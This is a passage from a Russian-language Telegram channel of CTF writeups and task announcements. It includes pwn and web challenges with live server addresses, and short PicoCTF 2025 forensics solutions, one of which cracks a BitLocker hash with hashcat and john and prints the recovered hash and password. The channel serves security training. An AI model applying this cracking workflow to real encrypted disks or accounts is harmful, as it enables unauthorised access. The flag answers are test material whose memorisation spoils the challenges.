- Для руководств дальше идет теория, почему так происходит, зачем вообще это нужно делать и тд;
- Практическая часть, как сделать, что выполнять, куда нажимать и так далее;
- Выводы.

Заголовок статьи должен быть уникален!
Всегда дели статьи на абзацы, чтобы текст легко поддавался пониманию.

Награждение:
Первое место - 3000 рублей
Второе место - 2000 рублей
Третье место - 1000 рублей
10.04.2025, 19:02
t.me/writeup_ctf/594
WR
Райтапы по CTF{2025}
1 671 подписчик
18
6
430
А у нас новая экспериментальная рубрика, где грамотные киберкотлеты делятся практическими советами и хитростями! Сегодня @Max_RSC расскажет, как решить актуальную проблему с инструментом zsteg, который после обновления системы упорно отказывается помогать решать задачки по стеге. Поддержите реакциями, если рубрика интересна! ❤️

Решение проблемы 'bad interpreter: /usr/bin/ruby3.1: no such file or directory'

Для начала давайте проверим, установлен ли Ruby в системе:
ruby -v
Если Ruby не установлен, то дальше читать не имеет смысла, пока вы его не установите. Но если у вас Kali Linux и вы обновляли систему до актуальной версии, вы, скорее всего, увидите:
ruby 3.3.7 (2025-01-15 revision be31f993d7)
Теперь давайте проверим, где именно zsteg находится на нашей системе:
which zsteg
На Kali мы, скорее всего, увидим:
/usr/local/bin/zsteg
Нам нужно изменить шебанг (первую строку) в файле /usr/local/bin/zsteg, чтобы он ссылался на корректный путь к Ruby. Открываем файл:
sudo nano /usr/local/bin/zsteg
Заменяем первую строку на:
#!/usr/bin/env ruby
Сохраняем изменения.

Скорее всего, потребуется переустановить zsteg. Выполняем:
gem install zsteg
Если переустановка прошла успешно, мы увидим в выводе строки 'Successfully installed...'. Теперь пробуем запустить zsteg с нужной картинкой в качестве аргумента — у нас это, скорее всего, получится!
8.04.2025, 14:23
t.me/writeup_ctf/593
WR
Райтапы по CTF{2025}
1 671 подписчик
1
7.04.2025, 15:55
t.me/writeup_ctf/591
WR
Райтапы по CTF{2025}
1 671 подписчик
6
511
Я проснулся, знаменитостью! Да!
Но...

Тбанк добавил мою милую мордашку в рекламу своего CTF 👉

Спасибо за внимательность @thankspluxury
7.04.2025, 15:54
t.me/writeup_ctf/590
WR
Райтапы по CTF{2025}
1 671 подписчик
37
5
515
7.04.2025, 15:54
t.me/writeup_ctf/589
WR
Райтапы по CTF{2025}
1 671 подписчик
7
22
1.3 k
#forensics
А вот это очень интересная задачка!

🦈 Спрей и Слёзы Wireshark’а

Дружище, у нас взлом! Похоже, криминал, по коням! 🚨 - часть 2

В очередной раз в галере "Ж" взломали какого-то "сына маминой подруги". Тебе, как самому единственному работяге в нашей конторе, необходимо выяснить:

- Учетную запись, над которой надругались хацкеры
- Какой глупенький пароль был у УЗ
- Какой вид атаки по (MITRE ATT&CK®) гопники из Мордора использовали, чтобы отжать креды у нашего хоббита

Сложность: “Почему я это делаю и куда подевался мой отпуск?”

Формат флага: artrone{login%password%T1234.567}

Автор: @artrone

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
6.04.2025, 23:05
t.me/writeup_ctf/588
WR
Райтапы по CTF{2025}
1 671 подписчик
24
11
488
А вот и еще два развернутых райтапa на форензику с недавнего HTB Cyber Apocalypse CTF 2025 от @Rean1mat0r. Давайте поддержим реакциями, Саня старался!

• Silent Trap (easy difficulty)
• Stealth Invasion (easy difficulty)

#htb #cyberapocalypsectf #forensics
5.04.2025, 21:38
t.me/writeup_ctf/587
WR
Райтапы по CTF{2025}
1 671 подписчик
6
7
1.1 k
#web
Бастион

Бастион – это не просто укрепление, а сложная и многослойная система безопасности, созданная для защиты от вторжений. Его инфраструктура подобна лабиринту, где каждый элемент продуман до мелочей: мощные стены, скрытые механизмы, надежные проходы и хитроумные ловушки. Однако, как и в любой обороне, у бастиона может быть слабое место – лазейка, тщательно спрятанный бэкдор, известный лишь немногим. И если такой изъян существует, он превращает неприступную крепость в иллюзию защиты, оставляя ее уязвимой перед тем, кто знает, куда бить.

https://kfcctf0bastion.pythonanywhere.com

Формат флага: FLAG{...}

Upd. Добавлена ручка для очистки БД. Как только вы получили флаг, не забудьте убрать за собой, перейдя по /restart

Хинт 1: Думаю, бэкдор где-то в форме регистрации

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
3.04.2025, 15:51
t.me/writeup_ctf/586
WR
Райтапы по CTF{2025}
1 671 подписчик
11
3
489
Ребят, я тут подумал 💡

Почти у каждого же есть свой тг канал!

Если у вас есть свой тг канал и вы считаете его интересным то в комментариях под этим постом в одном сообщении приложите ссылку опишите одним предложением его цель и пользу

Я потом сделаю один большой пост с упоминанием интересных, так сказать за +rep 👉
2.04.2025, 18:19
t.me/writeup_ctf/585
WR
Райтапы по CTF{2025}
1 671 подписчик
16
16
855
Я вижу, что победила дружба!
Так что, публикую сразу оба!
Поддержите автора и канал огонечками! 🔥

Спасибо автору @liderroman!

nasOS: ссылка на райтап
Utils: ссылка на райтап

#VolgaCTF_2025

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
2.04.2025, 16:27
t.me/writeup_ctf/584
WR
Райтапы по CTF{2025}
1 671 подписчик
9
44
1.0 k
Подъехали райтапы с VolgaCTF_2025! 👉

SQL injection task
Автор: @AppSecs

сcылка на райтап

#VolgaCTF_2025

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
1.04.2025, 20:17
t.me/writeup_ctf/581
WR
Райтапы по CTF{2025}
1 671 подписчик
7
6
652
Представляем вашему вниманию два развернутых райтапа на интересную форензику с недавнего HTB Cyber Apocalypse CTF 2025 от ТОП-10 на Codeby Games:

• A New Hire (very easy difficulty)
• Cave Expedition (medium difficulty)

Автор: @Rean1mat0r

#htb #cyberapocalypsectf #forensics
1.04.2025, 19:18
t.me/writeup_ctf/580
WR
Райтапы по CTF{2025}
1 671 подписчик
4
8
1.1 k
#pwn
in-malloc-we-trust

Какие же глупые ошибки совершают разработчики, создавая CRUD-программы! Я уверен, что ошибок не допустил!

nc 45.12.114.80 32004

https://www.youtube.com/watch?v=1stQbTuUBIE

Автор: @s41nt0l3xus

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
1.04.2025, 14:04
t.me/writeup_ctf/579
WR
Райтапы по CTF{2025}
1 671 подписчик
11
8
443
#forensics #rdg2025

Scriptkidding

Автор: @k10nex

Ссылка на райтап

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
30.03.2025, 16:47
t.me/writeup_ctf/578
WR
Райтапы по CTF{2025}
1 671 подписчик
25
352
Приветики!

Райтапов с RDG CTF 2025 хотите?)

Если да, с вас сердечко на сообщение ❤️
30.03.2025, 16:39
t.me/writeup_ctf/577
WR
Райтапы по CTF{2025}
1 671 подписчик
5
5
434
#crypto
Тайна шести струн

В запыленном уголке старой мастерской вы нашли гитару Роберта Фриппа. Её строй кажется необычным, а на грифе виднеются загадочные отметки, словно кто-то оставил тайное послание:

BBCAGEGAACAGACBDGACBABAEDECEAEGEEBECBBCBEAEBCGAAGBECEB

Формат флага: flag{}

Хинт: Я слышал, что в информатике принято начинать нумерацию с нуля...

Автор: @blackwine554

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
29.03.2025, 14:14
t.me/writeup_ctf/576
WR
Райтапы по CTF{2025}
1 671 подписчик
17
2
505
Ваааай ваааай, смотрите какой @CyberFazaN счастливчик

Ваш человек в Майями организовал 🥰
28.03.2025, 02:18
t.me/writeup_ctf/575
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
7
4
373
Угнанный домен, утекшие данные — реализуй кибератаку на новом хосте Standoff Standalone!

В минувший понедельник внезапно стало известно о кибератаке на ИТ-компанию Carbon — одного из ведущих игроков Государства F.

Во время планового аудита служба ИБ обнаружила подозрительную активность в сети: оказалось, что доступ к контроллеру домена компании получили некие нарушители извне.

🚨 Какие последствия?
✔️ Несмотря на то что компания вернула контроль над инфраструктурой и сосредоточилась на устранении последствий, реальный масштаб ущерба пока неизвестен.
✔️ Клиенты обеспокоены: какие данные могли утечь?
✔️ Расследование продолжается, но уже очевидно, что компания потеряла часть очень важной информации.

💡 Твоя цель — повторить атаку: получить права доменного администратора в инфраструктуре Carbon. Если все пройдет удачно, флаг будет ждать тебя на его рабочем столе.

Автор хоста — Андрей Exited3n, а найти хост можно по адресу carbon.standalone.stf.

Проверь свои силы и проведи атаку — права администратора ждут тебя!
27.03.2025, 16:54
t.me/writeup_ctf/574
WR
Райтапы по CTF{2025}
1 671 подписчик
6
7
578
Event-Viewing. PicoCTF 2025 Writeup от @Max_RSC

Продолжаем серию разборов задач по форензике с PicoCTF 2025. Рассмотрим задачку Event-Viewing уровня сложности medium.

На этот раз нам нужно было покопаться в журналах событий Windows, чтобы найти улики по каждому из вредоносных инцидентов. Но иногда можно и нужно схитрить. В условиях соревнований время — это золото, так что если есть возможность решить задачку быстрее, даже если совсем не так, как задумывал автор, почему бы и нет? В конце концов, после соревнований всегда можно вернуться к задачке и решить ее по-другому.

Мы знаем, что флаг будет закодирован в base64. Давайте запустим парсер, который выведет все события в удобочитаемом формате, а затем просто отфильтруем вывод с помощью команды grep. Парсер, который я использую для таких задач, я прикрепил к посту. Главное, чтобы парсер и файл Windows_Logs.evtx находились в одной директории.

В условии сказано, что флаг состоит из трех частей. Первую часть найти проще всего, ведь мы знаем, что флаг начинается с picoCTF, что в base64 выглядит как cGljb0NURn.

Запускаем команду:

python3.12 evtx_parser.py | grep cGljb0NURn

И вот она, первая часть флага: cGljb0NURntFdjNudF92aTN3djNyXw==

Теперь, зная, что base64-строки часто заканчиваются на '==', давайте выведем все строки с двумя знаками '==' подряд. Выполняем команду:

python3.12 evtx_parser.py | grep '=='

И находим вторую часть флага: MXNfYV9wcjN0dHlfdXMzZnVsXw==

С третьей частью флага могут возникнуть проблемы, ведь она не обязательно будет заканчиваться на '==', потому что на PicoCTF флаги уникальны для каждой команды. Здесь есть несколько вариантов. Если с фантазией все в порядке, то можно догадаться, что третья часть флага начинается со слова "tool". Или можно просто поискать по последнему символу флага, то есть по '}'. В base64 слово "tool" (вернее "t00l") будет выглядеть как dDAwb.

python3.12 evtx_parser.py | grep dDAwb

В результате мы быстро находим последнюю часть флага: dDAwbF8zZjJhMWI0Y30K=

#picoctf2025 #forensics
26.03.2025, 19:08
t.me/writeup_ctf/573
WR
Райтапы по CTF{2025}
1 671 подписчик
1
1
412
Кстати, если у вас сохранились райтапы на прошлую VolgaCTF присылайте!
Я опубликую
25.03.2025, 17:50
t.me/writeup_ctf/572
WR
Райтапы по CTF{2025}
1 671 подписчик
5
4
460
Приветики ❤️

Есть план ребят:
1. Проходим квалификацию VolgaCTF 👉
2. Едем в Самару 🚀
3. Ловим волжский вайб 🎵
25.03.2025, 15:49
t.me/writeup_ctf/571
WR
Райтапы по CTF{2025}
1 671 подписчик
7
5
465
Кстати, на нашем канале вы можете найти парочку райтапов с прошлогоднего T-CTF!

А еще на YouTube есть целый плейлист с авторскими райтапами. Обязательно загляните, если вам интересен этот ивент.

Увидимся в Капибарске!
25.03.2025, 14:44
t.me/writeup_ctf/570
WR
Райтапы по CTF{2025}
1 671 подписчик
7
14
539
Ребятки, поговорил тут с котятками из Keenetic по ситуации с утечкой данных

Примите к сведению ⚔️

Компании Keenetic Limited (Гонконг) стало известно о несанкционированном доступе к базе данных мобильного приложения, который мог затронуть пользователей, зарегистрированных в мобильном приложении Keenetic до 16 марта 2023 года. Таким образом, если вы зарегистрировались в приложении позднее или не регистрировались в приложении вообще, то для вас нет связанных с этим событием рисков.

Если вы использовали мобильное приложение Keenetic до 16 марта 2023 года, то насколько нам известно, никакие данных не опубликованы публично и к ним нет публичного доступа. Исходя из анализа компании Keenetic Limited, риск мошеннических действий остается низким. Однако в качестве меры предосторожности компания Keenetic Limited рекомендует пользователям сменить пароли Wi-Fi, пароли от учетных записей пользователей устройств Keenetic, а также пароли, связанные с VPN.

Вы можете ознакомиться с последними рекомендациями по безопасности компании Keenetic Limited по этой ссылке https://keenetic.com/global/security?lang=ru

Ниже предлагаем ссылки на инструкции по смене паролей:

https://help.keenetic.ru/hc/ru/articles/360000867260.html

https://help.keenetic.ru/hc/ru/articles/360000867260.htmlhttps://help.keenetic.ru/hc/ru/articles/360000481960.html

А также пароли различных соединений, если использовали их:

https://help.keenetic.ru/hc/ru/articles/360000619060.html

https://help.keenetic.ru/hc/ru/articles/360000619060.htmlhttps://help.keenetic.ru/hc/ru/articles/360000612860.html

https://help.keenetic.ru/hc/ru/articles/360000612860.htmlhttps://help.keenetic.ru/hc/ru/articles/360000422620.html

https://help.keenetic.ru/hc/ru/articles/360000422620.htmlhttps://help.keenetic.ru/hc/ru/articles/360000599979.html
24.03.2025, 23:22
t.me/writeup_ctf/569
WR
Райтапы по CTF{2025}
1 671 подписчик
8
4
523
Ого! А вот и мой первый CTF в котором мне посчастливилось участвовать в 2024 году

Ребятки, встретимся в Капибарске

Регистрация открыта до 18.04 📝
24.03.2025, 05:08
t.me/writeup_ctf/568
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
3
321
🌄 Легендарный Код ИБ ПРОФИ | Кавказ

В конце марта активное ИБ-сообщество вновь соберется в сердце Кавказа, чтобы прокачать скиллы в кибербезе и на весь год зарядиться яркими впечатлениями

🗓 27-30 марта 2025
📍 Пятигорск, отель "Орлиные скалы"

💬 Два дня деловой программы с мастер-классами от топовых экспертов:

— Андрей Кузнецов, лидер продуктовой практики, Standоff
— Лука Сафонов, ГК Гарда​
— Роман Шапиро, руководитель департамента ИБ, Почта России
— Денис Макрушин, директор по продуктам безопасной разработки, Яндекс
— Артем Куличкин, и. о. директора по ИБ ДЗО, СОГАЗ
— Евгений Волошин, директор по стратегии, BI.ZONE
— Игорь Бирюков, руководитель, Киберхаб Сколково
— Артем Избаенков, член правления, АРСИБ​
— Кирилл Мякишев, директор по ИБ, Ozon

Кстати, все доклады будут доступны участникам ПРОФИ в записи, вы сможете вернуться к ним позже или показать коллегам.

💬 Два дня приключений: отправимся в джип-тур по Кавказу, посетим перевал Гумбаши, Сырные пещеры, поднимемся к Шаонинскому храму, покорим гору Машук... и это не весь список активностей!

💬 Расширение профессиональных границ: инсайты на кулуарных встречах, обмен опытом и контактами с экспертами и участниками, среди которых CISO, владельцы и директора ИТ-компаний.

Для кого Код ИБ ПРОФИ?

✅ Для опытных CISO,
которые хоть и достигли высот, но всегда рады оказаться в кругу "своих" и готовы делиться знаниями и опытом
✅ Для руководителей по ИТ и ИБ,
которые готовы развиваться и становиться, как минимум — дорогими и востребованными, а как максимум — ключевыми фигурами в индустрии
✅ Для БОССов кибербеза,
владельцев и директоров ИТ-компаний, которые могут обсудить идеи по развитию своих продуктов напрямую с ключевыми лицами, принимающими решения
✅ Для основателей стартапов,
которые могут на месте проверить свои гипотезы и сформировать будущее своих решений через механики кастдева.

Более подробная программа — на сайте Код ИБ.

В продаже осталось 10 билетов — успейте присоединиться к сильнейшему ИБ-комьюнити!
22.03.2025, 16:17
t.me/writeup_ctf/567
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
15
24
223
Топ-108 телеграм-каналов в ИБ

Сделали с каналом «Пакет Безопасности» второй рейтинг лучших Telegram-каналов в ИБ-отрасли, расширив выборку и добавив новые категории.

Выбирать лучшие каналы нам помогали ИБ-специалисты, PR-специалисты, маркетологи и журналисты ведущих деловых СМИ. Состав экспертного совета, который голосовал за каналы, опубликуем отдельно. Главный критерий по традиции — контент.

Каналы ранжируются по количеству голосов в своих категориях.

Авторские:

1. Пакет Безопасности
2. Пост Лукацкого
3. Сицебрекс! и Sachok
4. Ever Secure и Технологический болт Генона
5. Солдатов в телеграм, BESSEС, Евгений Касперский
6. ZLONOV, Управление уязвимостями и прочее и Топ кибербезопасности Батранкова

Offensive:

1. Похек
2. Red team brazzers
3. Багхантер
4. Кавычка
5. Егор Богомолов
6. Заметки Слонсера и PRO:PENTEST
7. s0i37_chanel
Поросенок Петр
GigaHackers

Defensive:

1. ESCalator
2. README.hta
3. Blue (h/c)at Café и Security wine (бывший - DevSecOps Wine) и Makrushin
4. Disasm.me channel
5. Четыре луча, AppSec Journey и PurpleBear

Mixed:

1. k8s (in)security
2. Кибервойна и Mobile AppSec World
3. Репорты простым языком
4. Сертификат безопасности
5. Кибербез образование, Райтапы по CTF {2025}, ГОСТ VPN | aveselov.ru, PWN AI, Monkey see, monkey do

Микроблоги:

1. Ильдар Пишет
2. Омский Багхантер
3. Банка пывна и Про ИБ с высоты каблуков и Кибербез Андрея Дугина
4. Двое из Кибермаркетинга
5. CyberBox и NA_SOC
6. Защита персональных данных и не только и SbX | Security by Xyurity

Новостные/агрегаторы:

1. SecАtor
2. НеЛукацкий
3. НеКасперский
4. Утечки информации и Порвали два трояна и Offensive Twitter
5. Об ЭП и УЦ
6. Максим Горшенин | imaxai и RUSCADASEC news: Кибербезопасность АСУ ТП

Корпоративные:

1. Kaspersky
2. Red Security
3. Positive Technologies
4. Борьба с киберпреступностью | F6 и BI.ZONE
5. Innostage
6. РТ-ИБ, ИнфоТеКС, Инфосистемы Джет, 3side кибербезопасности и Echelon Eyes
7. CURATOR, Angara Security, InfoWatchOut

Каналы IT-журналистов:

1. Грустный киберпанк
2. КиберBEZправил
3. Radio Tishina
4. Игнатий Цукергрохер
5. Doomtech
6. Убедился корр. ТАСС, Половников и Девочки/Перцева
7. Точксичная цифра, Первый канал, Электро⚡шок, это Жабин

OSINT:

1. Russian OSINT
2. КиберДед official
3. OSINT mindset ( https://t.me/osint_mindset )
4. Интернет-Розыск I OSINT I Киберрасследования ( https://t.me/irozysk )Schwarz_Osint ( https://t.me/Schwarz_Osint )
5. DanaScully ( https://t.me/xbshsuwiow83 ) STEIN: ИБ OSINT ( https://t.me/secur_researcher )network worm notes( https://t.me/nwnotes )BeholderIsHere Media HUB( https://t.me/BeholderIsHereHub )
6. Pandora’s box ( https://t.me/pandora_intelligence )

Юмор/мемы:

1. Cybersecurity memes off ( https://t.me/cybersecurity_memes_off )
2. Bimbosecurity ( https://t.me/bimbosec )и Я у мамы SecMemOps
3. #memekatz (https://t.me/memekatz) и Information Security Memes (https://t.me/infosecmemes)
4. Спасите Нарциссо (https://t.me/savenarcisso) и Memes 365 (https://t.me/bugbountymeme)
5. OTSOSINT (https://t.me/ots0sint) и The After Times (https://t.me/theaftertimes) и Вредные советы по ИБ (https://t.me/badofis)

Специальная номинация: канал «Код ИБ»( https://t.me/codeibnews )

PR Machine https://t.me/PR_machine_Nika

@cybersachok
21.03.2025, 18:06
t.me/writeup_ctf/566
WR
Райтапы по CTF{2025}
1 671 подписчик
151
5
440
Теперь официально, я батя
У меня родился сын 🍼
19.03.2025, 19:19
t.me/writeup_ctf/565
WR
Райтапы по CTF{2025}
1 671 подписчик
15
4
815
flags are stepic. PicoCTF 2025 Writeup от @Max_RSC

Продолжаем серию разборов задач по форензике с PicoCTF 2025. Рассмотрим задачку flags are stepic уровня сложности medium.

Несмотря на то, что за эту задачку предлагалось всего 100 баллов, справиться с ней удалось немногим, а некоторые участники охарактеризовали её как уцуцугу.

Запускаем инстанс и переходим на сайт. Сначала мне показалось, что здесь что-то вроде Navy Signals Code — необходимо составить флаг из флагов стран. Однако всё оказалось гораздо интереснее.

Подсказка "In the country that doesn't exist, the flag persists" намекает на то, что флаг нужно искать в несуществующей стране. Такую страну можно быстро найти — это Upanzi Network. Скачиваем флаг этой "страны" на свой компьютер:

wget http://standard-pizzas.picoctf.net:61688/flags/upz.png

Здесь начинается этап, который вызвал наибольшие трудности. Имели место и вовсе курьезные ситуации, когда на тематических форумах участники предлагали денежное вознаграждение за помощь в решении этой задачки :D

Итак, что нужно делать? Название задачки решило всё: flags are stepic. Немного погуглив, я нашел man-страницу стегоутилиты stepic:

# stepic (1)           - Python image steganography

Думаю, идея ясна. Осталось разобраться с синтаксисом, который оказался довольно простым:

stepic -d -i upz.png -o output.jpg

Таким образом, вторая часть задачки – это стеганография. Стеганография как часть форензики.

Дальше всё банально:

strings -n 8 output.jpg | grep -i pico

Получаем флаг.

#picoctf2025 #forensics
19.03.2025, 16:08
t.me/writeup_ctf/564
WR
Райтапы по CTF{2025}
1 671 подписчик
13
2
460
Никогда так не делал, но хочется больше стикер-реакций...

https://t.me/boost/writeup_ctf
18.03.2025, 21:47
t.me/writeup_ctf/563
WR
Райтапы по CTF{2025}
1 671 подписчик
20
7
874
Bitlocker-1. PicoCTF 2025 Writeup от @Max_RSC

Неожиданный интерес со стороны аудитории вдохновил меня и побудил быстрее взяться за дело. Итак, задачка Bitlocker-1 с PicoCTF 2025, категория forensics, уровень сложности medium.

Нам предоставлен диск bitlocker-1.dd, зашифрованный с использованием BitLocker. Наша цель — взломать хеш пароля BitLocker, получить доступ к диску и извлечь содержащиеся на нем данные.

Первым шагом мы извлекаем хеш пароля с помощью утилиты bitlocker2john:

bitlocker2john -i bitlocker-1.dd > bitlocker.hash

Теперь запускаем инструмент для взлома хешей. Я использовал Hashcat, но также можно было воспользоваться John the Ripper:

john --wordlist=rockyoulight.txt bitlocker.hash

В условиях задачки упоминается, что пароль является простым, поэтому в целях экономии времени я применил облегченную версию словаря rockyou:

hashcat -m 22100 -a 0 bitlocker.hash rockyoulight.txt

После некоторого времени работы Hashcat успешно находит пароль:

$bitlocker$0$16$cb4809fe9628471a411f8380e0f668db$1048576$12$d04d9c58eed6da010a000000$60$68156e51e53f0a01c076a32ba2b2999afffce8530fbe5d84b4c19ac71f6c79375b87d40c2d871ed2b7b5559d71ba31b6779c6f41412fd6869442d66d:jacqueline

Как можно заметить, пароль соответствует имени пользователя (Jacky), значит, мы на верном пути.

Теперь мы можем открыть зашифрованный диск с помощью инструмента cryptsetup:

sudo cryptsetup bitlkOpen bitlocker-1.dd windows

Также можно воспользоваться инструментом dislocker — здесь кому как больше нравится.

Открываем диск и сразу же находим флаг.

#picoctf2025 #forensics
18.03.2025, 16:20
t.me/writeup_ctf/562
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
14
3
310
📢 Важное обновление!

🔸Платформа переехала с polyctf.ru на новый домен — duckerz.ru 🚀
🔸Прогресс на аккаунтах остался без изменений
🔸Появилась новая система достижений для пользователей
🔸Полный ребрендинг и новый дизайн с уточками 🦆
🔸Учли ваши пожелания к платформе и реализовали улучшенный функционал 💻

Опробуйте её уже сейчас — DUCKERZ 👨‍💻

💬Присоединяйтесь к нашему чату: @duckerz_chat

✍️ По любым вопросам обращайтесь к @myqookie

👉 Канал | 💬 Чат | 👨‍💻 Платформа
14.03.2025, 18:33
t.me/writeup_ctf/561
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
3
4
204
Всем привет 🦉

Мы с крутыми новостями 🚩
Скоро выходные, а значит, пора решать CTF, и как раз открылась регистрация на NeoQUEST, который пройдет с 15.03.25 00:00 до 23.03.25 23:59!

Это CTF-соревнования с личным зачетом еще и 2х уровней сложности: для начинающих свой путь в CTF есть школьный трек, а для прошаренных, желающих поломать немножко голову, есть взрослый трек!

Поэтому можно смело и без раздумий регистрироваться:
📎 на уровень для начинающих
📎 на уровень для прошаренных

Ваше СНО ВШК 👨‍💻
14.03.2025, 16:48
t.me/writeup_ctf/560
WR
Райтапы по CTF{2025}
1 671 подписчик
15
11
1.1 k
Опа-опа! У нас первый таск по 🕵️‍♂️ FORENSICS!

Блушники, налетайте! 💙

#forensics
😳 Panic attack

Дружище, у нас взлом! Похоже, криминал, по коням! 🚨

Есть два журнала логов. Необходимо выяснить:

• Тип (название) атаки по классификации (MITRE ATT&CK®), одним словом, с маленькой буквы
• К какой учетной записи злоумышленники смогли получить доступ, одним словом, с маленькой буквы
• Инструмент, через который злоумышленники использовали взломанную учетную запись, одним словом, с маленькой буквы, без расширения

Файлы журналов [тык]

Формат флага, разделитель %:

flag{type%user%utility}

Автор: @artrone

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
11.03.2025, 18:07
t.me/writeup_ctf/559
WR
Райтапы по CTF{2025}
1 671 подписчик
2
5
1.0 k
#pwn
echo-backdoor-ultimate

❕Это четвертый таск из серии echo
Вот первый, вот второй, а вот третий

Мой начальник посчитал функцию с названием backdoor подозрительной и настоял на её удалении. Старый дурак так ничего и не понял, ROP-цепочку ему в ***!

45.12.114.80:33003

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
10.03.2025, 19:04
t.me/writeup_ctf/558
WR
Райтапы по CTF{2025}
1 671 подписчик
Репост
5
7
312
‼️ Стартует регистрация на RDG CTF ‼️

Соревнования пройдут в двух зачетах: студенческом и школьном.

Призёры среди школьников смогут получить дополнительные баллы при поступлении в ДВФУ на направления «Информационная безопасность» и «Компьютерная безопасность» 🖥

Если вы не являетесь студентом, представляете разные вузы или обучаетесь в вузе за пределами Дальнего Востока, вы можете принять участие онлайн вне зачета.

🔥 Вас ждёт 8 часов захватывающего TASK-BASED турнира! 🔥

⏳ Регистрация команд открыта до 27 марта — успейте подать заявку!

📌 Формат: оффлайн + онлайн (10 приглашённых команд в очном формате).
👥 Состав команды: до 7 человек. Количество команд не ограничено.

📩 Вопросы: @collapsz

🔗 Регистрация: [тык]

🚀 До встречи на соревнованиях!
10.03.2025, 13:10
t.me/writeup_ctf/557
WR
Райтапы по CTF{2025}
1 671 подписчик
20
334
С 8 марта, прекрасные девушки! 🌸 Пусть этот день принесет вам море улыбок, счастья и любви. Желаю, чтобы каждый день был наполнен радостью, а мечты сбывались. Пусть весна дарит вдохновение, а окружающие ценят вашу доброту и красоту.
8.03.2025, 18:53
t.me/writeup_ctf/556
WR
Райтапы по CTF{2025}
1 671 подписчик
2
373
7.03.2025, 02:48
t.me/writeup_ctf/553
WR
Райтапы по CTF{2025}
1 671 подписчик
2
372
7.03.2025, 02:48
t.me/writeup_ctf/552
WR
Райтапы по CTF{2025}
1 671 подписчик
2
374
7.03.2025, 02:48
t.me/writeup_ctf/551
WR
Райтапы по CTF{2025}
1 671 подписчик
22
2
382
7.03.2025, 02:48
t.me/writeup_ctf/550
WR
Райтапы по CTF{2025}
1 671 подписчик
2
378
Ура! Мне довелось наблюдать невероятный феерверк в виде обломков Starship!
7.03.2025, 02:48
t.me/writeup_ctf/555
WR
Райтапы по CTF{2025}
1 671 подписчик
2
375
7.03.2025, 02:48
t.me/writeup_ctf/554
WR
Райтапы по CTF{2025}
1 671 подписчик
1
2
864
#pwn
echo-backdoor-hard

❕Это третий таск из серии echo
Вот первый, a вот второй

Добавлю-ка я в бэкдор немного случайности!

45.12.114.80:33002

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
6.03.2025, 19:03
t.me/writeup_ctf/549
WR
Райтапы по CTF{2025}
1 671 подписчик
4
2
834
#pwn
echo-backdoor-medium

❕Это второй таск из серии echo
Вот первый

Похоже, что бэкдор оказался слишком простым в эксплуатации. Думаю, стоит добавить птичью защиту!

45.12.114.80:33001

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
5.03.2025, 19:24
t.me/writeup_ctf/548
WR
Райтапы по CTF{2025}
1 671 подписчик
17
1
361
С днем рождения, дорогой @wr3dmast3rvs ❤️❤️❤️
5.03.2025, 18:12
t.me/writeup_ctf/547
WR
Райтапы по CTF{2025}
1 671 подписчик
3
394
#misc
Шифрование для перфокарты

Вчера мне попалась на глаза схема шифрования перфоленты и теперь мне не терпится разобраться, как она функционирует. Не мог бы ты мне в этом помочь?

Формат флага: KFCctf{...}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
4.03.2025, 20:42
t.me/writeup_ctf/546
WR
Райтапы по CTF{2025}
1 671 подписчик
1
1
393
Всем привет! 👉

Хочу напомнить, что очень жду ваши рекомендации по учебным материалам, благодаря которым вы стали настоящими кибер-котлетами. Это не обязательно знания по информационной безопасностью. Важен факт, что вы можете и хотите их порекомендовать от себя лично. Вот основной пост, про эту категорию материалов на канале

А ещё, хочу напомнить, что у нас есть ламповый чатик @writeup_chat, где мы обсуждаем всё-всё-всё, в том числе и мемы 🤤

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
4.03.2025, 16:54
t.me/writeup_ctf/545
WR
Райтапы по CTF{2025}
1 671 подписчик
4
5
853
Этим постом мы начинаем серию заданий, посвященных эксплуатации бинарных уязвимостей echo-сервиса. Я уже справился с задачкой, так что догоняйте, киберкотлеты!

#pwn
echo-backdoor-easy

Начальник поручил мне написать echo-сервис. Старый дурак не хочет повышать мне зарплату, поэтому я оставлю в сервисе бэкдор!

45.12.114.80:33000

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
3.03.2025, 20:15
